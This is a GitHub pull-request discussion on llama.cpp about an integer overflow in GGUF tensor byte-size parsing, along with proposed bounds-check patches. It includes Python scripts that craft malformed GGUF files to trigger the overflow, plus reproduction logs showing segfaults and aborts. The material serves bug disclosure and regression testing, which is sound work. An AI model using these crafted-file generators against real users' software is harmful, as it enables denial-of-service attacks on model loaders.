Fix integer overflow in GGUF tensor parsing #18674

Closed

alexanderkent wants to merge 2 commits into ggml-org:master from alexanderkent:fix/heap-overflow-gguf

Conversation

@alexanderkent

This PR addresses a heap buffer overflow vulnerability caused by integer overflow in ggml_nbytes during GGUF tensor parsing.

Changes:

  • ggml/src/ggml.c: Added ggml_nbytes_safe() with checked arithmetic that returns SIZE_MAX on overflow.
  • ggml/src/gguf.cpp: Added strict validation in gguf_init_from_file_impl to reject tensors where byte size overflows.
  • ggml/include/ggml.h: Declared ggml_nbytes_safe() API.

Impact:
Prevents heap-based buffer overflow where ggml_nbytes wraps around due to integer overflow. Mitigates potential RCE via malicious GGUF files.

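For illustration, here is a minimal standalone C sketch of the kind of wraparound being described (illustrative only, not llama.cpp code; the shape and strides correspond to an F32 tensor of shape [1024, 1024, 2^42+1, 1]):

#include <stdint.h>
#include <stdio.h>

int main(void) {
    // stride of dimension 2 for an F32 tensor with ne[0] = ne[1] = 1024:
    // 4 bytes * 1024 * 1024 = 4 MiB = 2^22
    const size_t nb2 = (size_t) 1 << 22;
    // crafted extent along dimension 2: 2^42 + 1 elements
    const uint64_t ne2 = (1ULL << 42) + 1;

    // (ne[2] - 1) * nb[2] = 2^42 * 2^22 = 2^64, which wraps to 0 in a 64-bit size_t
    const size_t term = (size_t) (ne2 - 1) * nb2;
    printf("term = %zu\n", term); // prints 0, so the computed tensor size stays tiny

    return 0;
}
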
@JohannesGaessler
Contributor

Mitigates potential RCE via malicious GGUF files.

How would one do that? Was "AI" used for this PR?

@ServeurpersoCom
Contributor

Let's not be alarmist here. It would be helpful to publish the malformed GGUF example. This is a buffer overflow, not an RCE (the R stands for Remote), and turning it into a genuine ACE (Arbitrary Code Execution: Local exploit) would require significant expertise and bypassing modern OS protections (ASLR, DEP/NX, stack canaries, etc.). So let's fix this local buffer overflow in a minimalist way :) I tested the patch, no regressions, but I think we can make it simpler.

@github-actions github-actions bot added the ggml label (changes relating to the ggml tensor library for machine learning) on Jan 7, 2026
@JohannesGaessler JohannesGaessler left a comment
Contributor

This PR is needlessly complicated; we already have a check that the number of elements is representable as int64_t, so it's enough to just do an equivalent check afterwards for the size in bytes and size_t. Also add a corresponding test to test-gguf.cpp. I don't see how a potential overflow in ggml_nbytes could be exploited in terms of security.

Removed redundant inline overflow checks from stride calculations.
The ggml_nbytes_safe() call before allocation handles all overflow
scenarios, making the earlier checks unnecessary.
@ServeurpersoCom
Contributor

ServeurpersoCom commented Jan 7, 2026

Like this one ?

(root|~/llama.cpp.pascal) git diff 86ec8a55964de893229209b320367a461d03eb86
diff --git a/ggml/src/ggml.c b/ggml/src/ggml.c
index 09b8eb466..7845c2cb2 100644
--- a/ggml/src/ggml.c
+++ b/ggml/src/ggml.c
@@ -1235,6 +1235,26 @@ int64_t ggml_nrows(const struct ggml_tensor * tensor) {
     return tensor->ne[1]*tensor->ne[2]*tensor->ne[3];
 }

+static inline bool ggml_size_add_overflow(size_t a, size_t b, size_t * result) {
+    if (a > SIZE_MAX - b) {
+        return true;
+    }
+    *result = a + b;
+    return false;
+}
+
+static inline bool ggml_size_mul_overflow(size_t a, size_t b, size_t * result) {
+    if (a == 0 || b == 0) {
+        *result = 0;
+        return false;
+    }
+    if (a > SIZE_MAX / b) {
+        return true;
+    }
+    *result = a * b;
+    return false;
+}
+
 size_t ggml_nbytes(const struct ggml_tensor * tensor) {
     for (int i = 0; i < GGML_MAX_DIMS; ++i) {
         if (tensor->ne[i] <= 0) {
@@ -1247,13 +1267,25 @@ size_t ggml_nbytes(const struct ggml_tensor * tensor) {
     if (blck_size == 1) {
         nbytes = ggml_type_size(tensor->type);
         for (int i = 0; i < GGML_MAX_DIMS; ++i) {
-            nbytes += (tensor->ne[i] - 1)*tensor->nb[i];
+            size_t add;
+            if (ggml_size_mul_overflow((size_t) (tensor->ne[i] - 1), tensor->nb[i], &add) ||
+                ggml_size_add_overflow(nbytes, add, &nbytes)) {
+                GGML_ABORT("%s: tensor byte size overflow", __func__);
+            }
         }
     }
     else {
-        nbytes = tensor->ne[0]*tensor->nb[0]/blck_size;
+        size_t base;
+        if (ggml_size_mul_overflow((size_t) tensor->ne[0], tensor->nb[0], &base)) {
+            GGML_ABORT("%s: tensor byte size overflow", __func__);
+        }
+        nbytes = base / blck_size;
         for (int i = 1; i < GGML_MAX_DIMS; ++i) {
-            nbytes += (tensor->ne[i] - 1)*tensor->nb[i];
+            size_t add;
+            if (ggml_size_mul_overflow((size_t) (tensor->ne[i] - 1), tensor->nb[i], &add) ||
+                ggml_size_add_overflow(nbytes, add, &nbytes)) {
+                GGML_ABORT("%s: tensor byte size overflow", __func__);
+            }
         }
     }

This patch just adds two inline helpers that check whether a multiplication or addition would overflow before performing it, then aborts cleanly if it would. That keeps the change surgical, confined to ggml_nbytes() without touching anything else.
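For completeness, a tiny standalone harness exercising the two helpers (illustrative only; in the patch they are static inside ggml.c, so they are copied here just to make the demo self-contained):

#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

// copies of the helpers from the diff above, only for this self-contained demo
static inline bool ggml_size_add_overflow(size_t a, size_t b, size_t * result) {
    if (a > SIZE_MAX - b) {
        return true;
    }
    *result = a + b;
    return false;
}

static inline bool ggml_size_mul_overflow(size_t a, size_t b, size_t * result) {
    if (a == 0 || b == 0) {
        *result = 0;
        return false;
    }
    if (a > SIZE_MAX / b) {
        return true;
    }
    *result = a * b;
    return false;
}

int main(void) {
    size_t r;
    // 2^42 * 2^22 = 2^64 does not fit in a 64-bit size_t, so overflow is reported
    assert(ggml_size_mul_overflow((size_t) 1 << 42, (size_t) 1 << 22, &r));
    // 2^20 * 2^22 = 2^42 fits, and the product is returned through r
    assert(!ggml_size_mul_overflow((size_t) 1 << 20, (size_t) 1 << 22, &r) && r == ((size_t) 1 << 42));
    // SIZE_MAX + 1 overflows
    assert(ggml_size_add_overflow(SIZE_MAX, 1, &r));
    return 0;
}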

@ServeurpersoCom
Contributor

I'm checking; I think we can make it even simpler, earlier in the loader!

@ServeurpersoCom
Contributor

ServeurpersoCom commented Jan 7, 2026

We can do it here, with the other checks:

diff --git a/ggml/src/gguf.cpp b/ggml/src/gguf.cpp
index b165d8bdc..5cd11ba46 100644
--- a/ggml/src/gguf.cpp
+++ b/ggml/src/gguf.cpp
@@ -585,6 +585,16 @@ struct gguf_context * gguf_init_from_file_impl(FILE * file, struct gguf_init_par
                 break;
             }

+            // check that total size in bytes fits in size_t
+            const uint64_t ne_total = (uint64_t)info.t.ne[0] * info.t.ne[1] * info.t.ne[2] * info.t.ne[3];
+            const uint64_t bytes_total = ne_total * type_size / blck_size;
+            if (bytes_total > SIZE_MAX) {
+                GGML_LOG_ERROR("%s: tensor '%s' size overflow (%" PRIu64 " bytes > SIZE_MAX)\n",
+                    __func__, info.t.name, bytes_total);
+                ok = false;
+                break;
+            }
+
             // calculate byte offsets given the tensor shape and type
             info.t.nb[0] = type_size;
             info.t.nb[1] = info.t.nb[0]*(info.t.ne[0]/blck_size);

@JohannesGaessler
Contributor

Just check whether ggml_nelements(...)/ggml_blck_size(...) <= SIZE_MAX/ggml_type_size(...), the variant you have is more susceptible to overflows.

@ServeurpersoCom
Contributor

Yes! Dividing before multiplying avoids intermediate overflow in the check itself:

--- a/ggml/src/gguf.cpp
+++ b/ggml/src/gguf.cpp
@@ -585,6 +585,15 @@ struct gguf_context * gguf_init_from_file_impl(FILE * file, struct gguf_init_par
                 break;
             }

+            // check that total size in bytes fits in size_t
+            const int64_t ne_total = info.t.ne[0] * info.t.ne[1] * info.t.ne[2] * info.t.ne[3];
+            if (blck_size > 0 && (uint64_t)ne_total / blck_size > SIZE_MAX / type_size) {
+                GGML_LOG_ERROR("%s: tensor '%s' size overflow\n",
+                    __func__, info.t.name);
+                ok = false;
+                break;
+            }
+
             // calculate byte offsets given the tensor shape and type
             info.t.nb[0] = type_size;
             info.t.nb[1] = info.t.nb[0]*(info.t.ne[0]/blck_size);
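A quick standalone illustration of why the division-first form matters (example numbers only, not llama.cpp code): with 2^62 elements, block size 1 and a 4-byte type, the naive product wraps to 0 and would slip past a "> SIZE_MAX" comparison, while the rearranged check still flags the overflow:

#include <stdint.h>
#include <stdio.h>

int main(void) {
    const uint64_t ne_total  = 1ULL << 62; // 2^62 elements: passes the int64_t element-count check
    const uint64_t type_size = 4;          // e.g. F32
    const uint64_t blck_size = 1;

    // naive: ne_total * type_size = 2^64 wraps to 0 before any comparison happens
    const uint64_t bytes_naive = ne_total * type_size / blck_size;

    // rearranged: divide first, then compare against SIZE_MAX / type_size
    const int overflow = ne_total / blck_size > SIZE_MAX / type_size;

    printf("naive bytes_total = %llu, overflow detected = %d\n",
           (unsigned long long) bytes_naive, overflow); // prints 0 and 1 on a 64-bit build
    return 0;
}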

@ServeurpersoCom
Contributor

ServeurpersoCom commented Jan 7, 2026

(.venv) (root|~/evil) ls
bof3d.py  gemma-3-1b-it-Q8_0.gguf
(.venv) (root|~/evil) nano bof2d.py
(.venv) (root|~/evil) nano bof2d.py
(.venv) (root|~/evil) python3 bof2d.py gemma-3-1b-it-Q8_0.gguf bof-gemma-3-1b-it-Q8_0.gguf
Target tensor #1: token_embd.weight
Original shape: [  1152 262144]
GGUF v3
Patched dim[1]: 262144 -> 4398046511105 (2^42+1)
This triggers: (2^42) * stride = 2^64 overflow wrap to 0
Created: bof-gemma-3-1b-it-Q8_0.gguf (1069306400 bytes)
(.venv) (root|~/evil) ../llama.cpp.pascal/build/bin/llama-cli --model ~/evil/bof-gemma-3-1b-it-Q8_0.gguf -n 1 -p "test"
ggml_cuda_init: found 1 CUDA devices:
  Device 0: NVIDIA RTX PRO 6000 Blackwell Workstation Edition, compute capability 12.0, VMM: yes

Loading model... |gguf_init_from_file_impl: tensor 'blk.0.attn_k.weight' has offset 320868864, expected 5383208929597152
gguf_init_from_file_impl: failed to read tensor data
llama_model_load: error loading model: llama_model_loader: failed to load model from /root/evil/bof-gemma-3-1b-it-Q8_0.gguf
llama_model_load_from_file_impl: failed to load model
llama_params_fit: encountered an error while trying to fit params to free device memory: failed to load model
gguf_init_from_file_impl: tensor 'blk.0.attn_k.weight' has offset 320868864, expected 5383208929597152
gguf_init_from_file_impl: failed to read tensor data
llama_model_load: error loading model: llama_model_loader: failed to load model from /root/evil/bof-gemma-3-1b-it-Q8_0.gguf
llama_model_load_from_file_impl: failed to load model
common_init_from_params: failed to load model '/root/evil/bof-gemma-3-1b-it-Q8_0.gguf'
srv    load_model: failed to load model, '/root/evil/bof-gemma-3-1b-it-Q8_0.gguf'
Failed to load the model
(.venv) (root|~/evil)

has offset 320868864, expected 5383208929597152

I reproduced it -> it's a clean exit!

(.venv) (root|~/evil) cat bof2d.py
#!/usr/bin/env python3
import sys
from gguf import GGUFReader
import struct

def patch_gguf_overflow(input_file, output_file):
    # Parse GGUF
    reader = GGUFReader(input_file)
    tensors = list(reader.tensors)

    # Find first tensor with 2+ dimensions
    target_idx = None
    for i, t in enumerate(tensors):
        if len(t.shape) >= 2:
            target_idx = i
            break

    if target_idx is None:
        print("ERROR: no tensor with 2+ dimensions found")
        return

    target = tensors[target_idx]
    dim_idx = 1  # Patch dimension 1 for 2D tensors

    print(f"Target tensor #{target_idx}: {target.name}")
    print(f"Original shape: {target.shape}")

    # Load file
    with open(input_file, 'rb') as f:
        data = bytearray(f.read())

    # Parse header
    version = struct.unpack('<I', data[4:8])[0]
    print(f"GGUF v{version}")

    # Find tensor by name
    target_name = target.name.encode('utf-8')
    name_offset = data.find(struct.pack('<Q', len(target_name)) + target_name, 1000)

    if name_offset == -1:
        print("ERROR: tensor not found")
        return

    # Parse tensor header
    offset = name_offset
    name_len = struct.unpack('<Q', data[offset:offset+8])[0]
    offset += 8 + name_len
    n_dims = struct.unpack('<I', data[offset:offset+4])[0]
    offset += 4

    if dim_idx >= n_dims:
        print(f"ERROR: dim_idx {dim_idx} >= n_dims {n_dims}")
        return

    # Patch dimension with 2^42 + 1
    evil_value = 4398046511105
    patch_offset = offset + (dim_idx * 8)
    old_val = struct.unpack('<Q', data[patch_offset:patch_offset+8])[0]
    struct.pack_into('<Q', data, patch_offset, evil_value)

    print(f"Patched dim[{dim_idx}]: {old_val} -> {evil_value} (2^42+1)")
    print(f"This triggers: (2^42) * stride = 2^64 overflow wrap to 0")

    # Write
    with open(output_file, 'wb') as f:
        f.write(data)

    print(f"Created: {output_file} ({len(data)} bytes)")

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python3 bof.py input.gguf [output.gguf]")
        sys.exit(1)

    patch_gguf_overflow(
        sys.argv[1],
        sys.argv[2] if len(sys.argv) > 2 else 'evil_' + sys.argv[1].split('/')[-1]
    )
(.venv) (root|~/evil)

@ServeurpersoCom
Contributor

ServeurpersoCom commented Jan 7, 2026

OK I need to patch a model with a 3D or 4D tensor?

@ServeurpersoCom
Contributor

ServeurpersoCom commented Jan 7, 2026

Even the MoE models only have 3D tensors; I didn't notice any LLM with 4D tensors.

(.venv) (root|~/evil) python3 bof4d.py Qwen3-30B-A3B-Instruct-2507-UD-Q8_K_XL.gguf bof-qwen.gguf
ERROR: no tensor with 4 dimensions found
(.venv) (root|~/evil) python3 << 'EOF'
from gguf import GGUFReader
r = GGUFReader('Qwen3-30B-A3B-Instruct-2507-UD-Q8_K_XL.gguf')
shapes = {}
for t in r.tensors:
    ndim = len(t.shape)
    if ndim not in shapes:
        shapes[ndim] = []
    shapes[ndim].append((t.name, t.shape))

for ndim in sorted(shapes.keys()):
    print(f"\n{ndim}D tensors: {len(shapes[ndim])}")
    for name, shape in shapes[ndim][:3]:
        print(f"  {name}: {shape}")
EOF

1D tensors: 193
  output_norm.weight: [2048]
  blk.0.attn_k_norm.weight: [128]
  blk.0.attn_norm.weight: [2048]

2D tensors: 242
  output.weight: [  2048 151936]
  token_embd.weight: [  2048 151936]
  blk.0.attn_k.weight: [2048  512]

3D tensors: 144
  blk.0.ffn_down_exps.weight: [ 768 2048  128]
  blk.0.ffn_gate_exps.weight: [2048  768  128]
  blk.0.ffn_up_exps.weight: [2048  768  128]
(.venv) (root|~/evil) ls
bof2d.py  bof3d.py  bof4d.py  Qwen3-30B-A3B-Instruct-2507-UD-Q8_K_XL.gguf
(.venv) (root|~/evil) python3 bof3d.py Qwen3-30B-A3B-Instruct-2507-UD-Q8_K_XL.gguf bof-qwen.gguf
Target tensor #10: blk.0.ffn_down_exps.weight
Original shape: [ 768 2048  128]
GGUF v3
Patched dim[2]: 128 -> 4398046511105 (2^42+1)
This triggers: (2^42) * stride = 2^64 overflow wrap to 0
Created: bof-qwen.gguf (35989944736 bytes)
(.venv) (root|~/evil) ../llama.cpp.pascal/build/bin/llama-cli --model bof-qwen.gguf -n 1 -p "test"
ggml_cuda_init: found 1 CUDA devices:
  Device 0: NVIDIA RTX PRO 6000 Blackwell Workstation Edition, compute capability 12.0, VMM: yes

Loading model... -gguf_init_from_file_impl: tensor 'blk.0.ffn_gate_exps.weight' has offset 1677214720, expected 13835058056559870976
gguf_init_from_file_impl: failed to read tensor data
llama_model_load: error loading model: llama_model_loader: failed to load model from bof-qwen.gguf
llama_model_load_from_file_impl: failed to load model
llama_params_fit: encountered an error while trying to fit params to free device memory: failed to load model
gguf_init_from_file_impl: tensor 'blk.0.ffn_gate_exps.weight' has offset 1677214720, expected 13835058056559870976
gguf_init_from_file_impl: failed to read tensor data
llama_model_load: error loading model: llama_model_loader: failed to load model from bof-qwen.gguf
llama_model_load_from_file_impl: failed to load model
common_init_from_params: failed to load model 'bof-qwen.gguf'
srv    load_model: failed to load model, 'bof-qwen.gguf'
Failed to load the model
(.venv) (root|~/evil)

It's a clean exit on master without the patch, no buffer overflow. This clean exit does not invalidate the arithmetic issue itself, though: my repro only patches an existing GGUF and therefore fails early on offset validation; reaching the ggml_nbytes overflow would likely require generating a fully coherent GGUF from scratch.

@ngxson
Contributor

ngxson commented Jan 8, 2026

Prevents heap-based buffer overflow where ggml_nbytes wraps around due to integer overflow. Mitigates potential RCE via malicious GGUF files.

Could you provide a working PoC for such attack?

@alexanderkent
Author

Prevents heap-based buffer overflow where ggml_nbytes wraps around due to integer overflow. Mitigates potential RCE via malicious GGUF files.

Could you provide a working PoC for such attack?

Worst-case scenario (realistic):

  • Crash/DoS: the most likely outcome - the process segfaults when accessing unmapped memory.
  • Information disclosure: possible if an attacker can influence what is read from the heap.
  • Code execution: theoretically possible, but requires (1) heap feng shui to position controlled data, (2) bypassing ASLR/DEP/NX/stack canaries, (3) finding usable gadgets...

@ServeurpersoCom
Contributor

Repro input would really help here. For GGUF parsing (or any file/param input) issues, I think we should require at least a minimal crashing sample (DoS-level, shared privately with maintainers (?)). That allows us to add a regression test and validate a minimal fix (crash before -> no crash after) instead of discussing theoretical exploitability. I can test any provided samples in a hardened VM on a dedicated machine without problem!

@alexanderkent
Author

Repro input would really help here. For GGUF parsing (or any file/param input) issues, I think we should require at least a minimal crashing sample (DoS-level, shared privately with maintainers (?)). That allows us to add a regression test and validate a minimal fix (crash before -> no crash after) instead of discussing theoretical exploitability. I can test any provided samples in a hardened VM on a dedicated machine without problem!

I've attached overflow_poc.gguf.zip (112 bytes) - a minimal GGUF file with crafted dimensions that trigger integer overflow in ggml_nbytes.

To reproduce:

# Checkout pre-fix commit
git checkout ef83fb860
# Build with ASAN (optional, for clearer output)
cmake -B build -DLLAMA_SANITIZE_ADDRESS=ON
cmake --build build --target llama-gguf -j
# Test
./build/bin/llama-gguf overflow_poc.gguf r

Expected (unfixed):

tensor[0]: size = 4194304   ← wrapped from ~18 EB
zsh: segmentation fault  overflow_poc.gguf

overflow_poc.gguf.zip

@ServeurpersoCom
Contributor

It's interesting now:

(.venv) (root|~/A) python3 << 'EOF'
from gguf import GGUFReader
try:
    r = GGUFReader('overflow_poc.gguf')
    print(f"Tensors: {len(r.tensors)}")
    for t in r.tensors:
        print(f"  {t.name}: {t.shape} type={t.tensor_type}")
except Exception as e:
    print(f"Error: {e}")
EOF
Error: cannot reshape array of size 4 into shape (1,4398046511105,1024,1024)

(.venv) (root|~/A) /root/llama.cpp.pascal/build/bin/llama-gguf overflow_poc.gguf r
gguf_ex_read_0: version:      3
gguf_ex_read_0: alignment:   32
gguf_ex_read_0: data offset: 96
gguf_ex_read_0: n_kv: 0
gguf_ex_read_0: find key: some.parameter.string not found.
gguf_ex_read_0: n_tensors: 1
gguf_ex_read_0: tensor[0]: name = overflow_tensor, size = 4194304, offset = 0
gguf_init_from_file_impl: failed to read tensor data binary blob
Erreur de segmentation

(.venv) (root|~/A) /root/llama.cpp.pascal/build/bin/llama-cli -m overflow_poc.gguf
ggml_cuda_init: found 1 CUDA devices:
  Device 0: NVIDIA RTX PRO 6000 Blackwell Workstation Edition, compute capability 12.0, VMM: yes

Loading model... |llama_model_load: error loading model: tensor 'overflow_tensor' data is not within the file bounds, model is corrupted or incomplete
llama_model_load_from_file_impl: failed to load model
llama_params_fit: encountered an error while trying to fit params to free device memory: failed to load model
llama_model_load: error loading model: tensor 'overflow_tensor' data is not within the file bounds, model is corrupted or incomplete
llama_model_load_from_file_impl: failed to load model
common_init_from_params: failed to load model 'overflow_poc.gguf'
srv    load_model: failed to load model, 'overflow_poc.gguf'
Failed to load the model
(.venv) (root|~/A)

@ServeurpersoCom
Contributor

ServeurpersoCom commented Jan 8, 2026

With the minimized patch:

(.venv) (root|~/llama.cpp.pascal) cat overflow.patch
--- a/ggml/src/gguf.cpp
+++ b/ggml/src/gguf.cpp
@@ -585,6 +585,15 @@ struct gguf_context * gguf_init_from_file_impl(FILE * file, struct gguf_init_par
                 break;
             }

+            // check that total size in bytes fits in size_t
+            const int64_t ne_total = info.t.ne[0] * info.t.ne[1] * info.t.ne[2] * info.t.ne[3];
+            if (blck_size > 0 && (uint64_t)ne_total / blck_size > SIZE_MAX / type_size) {
+                GGML_LOG_ERROR("%s: tensor '%s' size overflow\n",
+                    __func__, info.t.name);
+                ok = false;
+                break;
+            }
+
             // calculate byte offsets given the tensor shape and type
             info.t.nb[0] = type_size;
             info.t.nb[1] = info.t.nb[0]*(info.t.ne[0]/blck_size);
(.venv) (root|~/llama.cpp.pascal) ./build/bin/llama-gguf ../A/overflow_poc.gguf r
gguf_init_from_file_impl: tensor 'overflow_tensor' size overflow
gguf_init_from_file_impl: failed to read tensor info
gguf_ex_read_0: failed to load '../A/overflow_poc.gguf'
/root/llama.cpp.pascal/examples/gguf/gguf.cpp:265: GGML_ASSERT(gguf_ex_read_0(fname) && "failed to read gguf file") failed
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
0x00007fa3cfef1bd3 in __GI___wait4 (pid=719270, stat_loc=0x0, options=0, usage=0x0) at ../sysdeps/unix/sysv/linux/wait4.c:30
30      ../sysdeps/unix/sysv/linux/wait4.c: Aucun fichier ou dossier de ce type.
#0  0x00007fa3cfef1bd3 in __GI___wait4 (pid=719270, stat_loc=0x0, options=0, usage=0x0) at ../sysdeps/unix/sysv/linux/wait4.c:30
30      in ../sysdeps/unix/sysv/linux/wait4.c
#1  0x00007fa3d034b71b in ggml_print_backtrace () from /root/llama.cpp.pascal/build/bin/libggml-base.so.0
#2  0x00007fa3d034b86e in ggml_abort () from /root/llama.cpp.pascal/build/bin/libggml-base.so.0
#3  0x0000563b7356f5e6 in main ()
[Inferior 1 (process 719269) detached]
Abandon
(.venv) (root|~/llama.cpp.pascal)

BEFORE:

  • llama-gguf: segfault (nbytes wrapped to 4MB instead of 18EB)
  • llama-cli: vague "data not within file bounds" (but NOT a BOF/DoS!)

AFTER:

  • llama-gguf: clean abort with "size overflow"
  • llama-cli: explicit "size overflow" message

The 9-line fix catches the overflow early in the loader, prevents the segfault in llama-gguf, and makes the error message in llama-cli explicit.

@ServeurpersoCom
Contributor

A working Python generator to document/test with:


(root|~/A) cat gen.py
#!/usr/bin/env python3
import struct
import sys

def generate_overflow_poc(output='overflow_poc.gguf'):
    """
    Generate minimal GGUF with integer overflow trigger.

    Tensor: [1024, 1024, 2^42+1, 1] shape causes:
      nb[2] = 4KB * 1024 = 4MB (2^22)
      (ne[2]-1) * nb[2] = 2^42 * 2^22 = 2^64 -> wraps to 0
    Result: ggml_nbytes() returns 4MB instead of 18 EB
    """

    data = bytearray()

    # Header
    data += b'GGUF'                          # magic
    data += struct.pack('<I', 3)             # version 3
    data += struct.pack('<Q', 1)             # tensor_count
    data += struct.pack('<Q', 0)             # metadata_count

    # Tensor info
    name = b'overflow_tensor'
    data += struct.pack('<Q', len(name))     # name_len
    data += name                             # name

    # Dimensions: [1024, 1024, 2^42+1, 1]
    data += struct.pack('<I', 4)             # n_dims
    data += struct.pack('<Q', 1024)          # ne[0]
    data += struct.pack('<Q', 1024)          # ne[1]
    data += struct.pack('<Q', 4398046511105) # ne[2] = 2^42 + 1
    data += struct.pack('<Q', 1)             # ne[3]

    # Type F32 (0) + offset
    data += struct.pack('<I', 0)             # type
    data += struct.pack('<Q', 0)             # offset = 0

    # Alignment padding to 32-byte boundary (0x60 = 96 bytes)
    while len(data) < 96:
        data += b'\x00'

    # Tensor data (deadbeef pattern - 16 bytes total)
    data += b'\xde\xad\xbe\xef' * 4          # 16 bytes of deadbeef

    with open(output, 'wb') as f:
        f.write(data)

    print(f"Generated {output} ({len(data)} bytes)")
    print(f"  Tensor: overflow_tensor")
    print(f"  Shape: [1024, 1024, 4398046511105, 1]")
    print(f"  Expected: 18 EB")
    print(f"  Wrapped: ~4 MB")

if __name__ == '__main__':
    output = sys.argv[1] if len(sys.argv) > 1 else 'overflow_poc.gguf'
    generate_overflow_poc(output)
(root|~/A) python3 gen.py
Generated overflow_poc.gguf (112 bytes)
  Tensor: overflow_tensor
  Shape: [1024, 1024, 4398046511105, 1]
  Expected: 18 EB
  Wrapped: ~4 MB
(root|~/A) xxd overflow_poc_original.gguf
00000000: 4747 5546 0300 0000 0100 0000 0000 0000  GGUF............
00000010: 0000 0000 0000 0000 0f00 0000 0000 0000  ................
00000020: 6f76 6572 666c 6f77 5f74 656e 736f 7204  overflow_tensor.
00000030: 0000 0000 0400 0000 0000 0000 0400 0000  ................
00000040: 0000 0001 0000 0000 0400 0001 0000 0000  ................
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: dead beef dead beef dead beef dead beef  ................
(root|~/A) xxd overflow_poc.gguf
00000000: 4747 5546 0300 0000 0100 0000 0000 0000  GGUF............
00000010: 0000 0000 0000 0000 0f00 0000 0000 0000  ................
00000020: 6f76 6572 666c 6f77 5f74 656e 736f 7204  overflow_tensor.
00000030: 0000 0000 0400 0000 0000 0000 0400 0000  ................
00000040: 0000 0001 0000 0000 0400 0001 0000 0000  ................
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: dead beef dead beef dead beef dead beef  ................
(root|~/A)

And the tested patch: ServeurpersoCom@c503651

@ngxson
Contributor

ngxson commented Jan 8, 2026

@alexanderkent I don't think the PoC is valid as-is, because you are intentionally using llama-gguf

When running with llama-server or llama-cli, it exits cleanly:

srv    load_model: loading model '../../Downloads/overflow_poc.gguf'
common_init_result: fitting params to device memory, for bugs during this step try to reproduce them with -fit off, or provide --verbose logs if the bug only occurs with -fit on
llama_model_load: error loading model: tensor 'overflow_tensor' data is not within the file bounds, model is corrupted or incomplete
llama_model_load_from_file_impl: failed to load model
llama_params_fit: encountered an error while trying to fit params to free device memory: failed to load model
llama_params_fit: fitting params to free memory took 0.00 seconds
llama_model_load_from_file_impl: using device Metal (Apple M3 Max) (unknown id) - 27647 MiB free
llama_model_load: error loading model: tensor 'overflow_tensor' data is not within the file bounds, model is corrupted or incomplete
llama_model_load_from_file_impl: failed to load model
common_init_from_params: failed to load model '../../Downloads/overflow_poc.gguf'
srv    load_model: failed to load model, '../../Downloads/overflow_poc.gguf'
srv    operator(): operator(): cleaning up before exit...
main: exiting due to model loading error

I don't believe this is a valid vulnerability in GGUF or the GGML library. It's just that the downstream code misses the boundary check. llama.cpp has such a check, but llama-gguf doesn't because it's a tool for debugging and testing, not for normal usage. We can add the check easily, though.
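For readers wondering what that boundary check amounts to, a rough sketch of the idea (placeholder names, not the actual llama.cpp or llama-gguf code):

#include <stdbool.h>
#include <stddef.h>

// Before reading a tensor's data blob, verify that offset + size stays inside
// the file, written so that the comparison itself cannot overflow.
static bool tensor_data_within_file(size_t data_offset, size_t tensor_nbytes, size_t file_size) {
    return tensor_nbytes <= file_size && data_offset <= file_size - tensor_nbytes;
}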

@ngxson
Contributor

ngxson commented Jan 9, 2026

Closing because this is not a valid bug in GGML or libllama

@ngxson ngxson closed this Jan 9, 2026
@JohannesGaessler
Contributor

I would consider it a valid bug in gguf.cpp and I will review and approve a PR that adds a simple and self-contained check in gguf.cpp along with a corresponding test case in test-gguf.cpp.

@alexanderkent
Author

Thanks everyone for looking into this.

I respectfully disagree with closing this. Here's proof that the vulnerability affects production llama.cpp tools, not just debug tools:

Dimensions: [2147483648, 2147483648, 1, 1] (2^31 × 2^31)
Element count: 2^62 < INT64_MAX ✓ (passes element check)
Byte size: 2^64 > SIZE_MAX ✗ (overflows, causing allocation failure)
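
Checking the claimed numbers with a short standalone snippet (illustrative only): 2^31 * 2^31 = 2^62 elements fits in int64_t, but 2^62 elements of a 4-byte type is 2^64 bytes, which wraps to 0 when computed in a 64-bit size_t:

#include <stdint.h>
#include <stdio.h>

int main(void) {
    const int64_t ne0 = INT64_C(2147483648); // 2^31
    const int64_t ne1 = INT64_C(2147483648); // 2^31
    const int64_t n_elements = ne0 * ne1;    // 2^62, still below INT64_MAX

    const size_t nbytes = (size_t) n_elements * 4; // F32 bytes: 2^64 wraps to 0

    printf("elements = %lld, nbytes = %zu\n", (long long) n_elements, nbytes);
    return 0;
}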

overflow_poc_friday.gguf.zip

Reproduction with llama-quantize (production tool)

# Build unfixed code with ASAN
git checkout ef83fb860
cmake -B build -DLLAMA_SANITIZE_ADDRESS=ON
cmake --build build --target llama-quantize -j

# Run PoC
./build/bin/llama-quantize overflow_poc_friday.gguf out.gguf Q4_0
llama-quantize

llama_model_loader: llama.vocab_size u32 = 2147483648
/src/llama-model-loader.cpp:912: GGML_ASSERT(cur->data != nullptr) failed
zsh: abort

Potential Root Cause

ggml_nbytes() in the GGML library overflows when calculating tensor size, returning 0 or a very small value. This causes:

  • Downstream code to allocate 0 bytes (or fail allocation)
  • NULL pointer dereference when accessing tensor data

The fix (ggml_nbytes_safe()) should likely be in the core library because:

  • Multiple production tools are affected (llama-quantize, llama-gguf). The existing bounds check in llama-model-loader.h:41 uses ggml_nbytes(), which returns the already-corrupted value, making the check ineffective.
  • Any future tool using gguf_init_from_file() would inherit this vulnerability.

@ServeurpersoCom
Contributor

I can reproduce with llama-quantize, though I understand there may be debate about whether this tool qualifies as a production utility or primarily a debugging tool.

(root|~/A) ./test_exploit.sh
[*] Testing with ASAN build...
main: build = 7749 (a75fd08e7)
main: built with GNU 12.2.0 for Linux x86_64
main: quantizing '/root/A/overflow_poc_friday.gguf' to '/tmp/out.gguf' as Q4_0
llama_model_loader: direct I/O is enabled, disabling mmap
llama_model_loader: loaded meta data with 18 key-value pairs and 1 tensors from /root/A/overflow_poc_friday.gguf (version GGUF V3 (latest))
llama_model_loader: Dumping metadata keys/values. Note: KV overrides do not apply in this output.
llama_model_loader: - kv   0:                       general.architecture str              = llama
llama_model_loader: - kv   1:                               general.name str              = overflow_poc
llama_model_loader: - kv   2:                          llama.block_count u32              = 1
llama_model_loader: - kv   3:                       llama.context_length u32              = 2048
llama_model_loader: - kv   4:                     llama.embedding_length u32              = 2147483648
llama_model_loader: - kv   5:                 llama.attention.head_count u32              = 32
llama_model_loader: - kv   6:              llama.attention.head_count_kv u32              = 32
llama_model_loader: - kv   7:                       llama.rope.freq_base f32              = 10000.000000
